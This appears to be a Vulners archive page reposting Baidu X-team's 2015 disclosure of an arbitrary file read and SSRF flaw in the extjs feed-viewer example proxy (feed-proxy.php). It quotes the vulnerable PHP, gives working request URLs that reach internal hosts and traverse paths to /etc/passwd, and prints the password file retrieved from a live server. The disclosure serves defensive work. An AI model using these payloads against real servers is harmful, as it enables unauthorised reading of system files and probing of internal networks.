Vulners
Lucene search
extjs Arbitrary File Read
`Hi all£º
Baidu Security Team found a vulnerability in extjs,with this vulnerability we can read arbitrary file and request internal http services
File: /examples/feed-viewer/feed-proxy.php line:3-line:6
$feed = $_REQUEST['feed'];
if($feed != '' && strpos($feed, 'http') === 0){
header('Content-Type: text/xml');
$xml = file_get_contents($feed);
When we request like this url
http://dev.sencha.com/extjs/5.0.0/examples/feed-viewer/feed-proxy.php?feed=http://10.1.1.1
if the resource exist,we can get internal http services info
¡°strpos($feed, 'http') === 0¡± we can request this url to bypass the restrictions achieve arbitrary file read
http://dev.sencha.com/extjs/5.0.0/examples/feed-viewer/feed-proxy.php?feed=http/../../../../../../../../../../../etc/passwd
view the HTML source code
root:x:0:0:Web-useast4 root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:Web-useast4 www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
landscape:x:103:108::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
ntp:x:105:111::/home/ntp:/bin/false
snmp:x:106:112::/var/lib/snmp:/bin/false
statd:x:107:65534::/var/lib/nfs:/bin/false
postfix:x:108:114::/var/spool/postfix:/bin/false
Submitter: zhanghao@Baidu X-team gaojianfeng@Baidu X-team shitong@Baidu X-team
________________________________
Id:Yaseng
Hi: Hisengberg
Team: Baidu X-team
E-mail:[email protected]<mailto:[email protected]>
[tips]
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 May 2015 00:00Current
0.2Low risk
Vulners AI Score0.2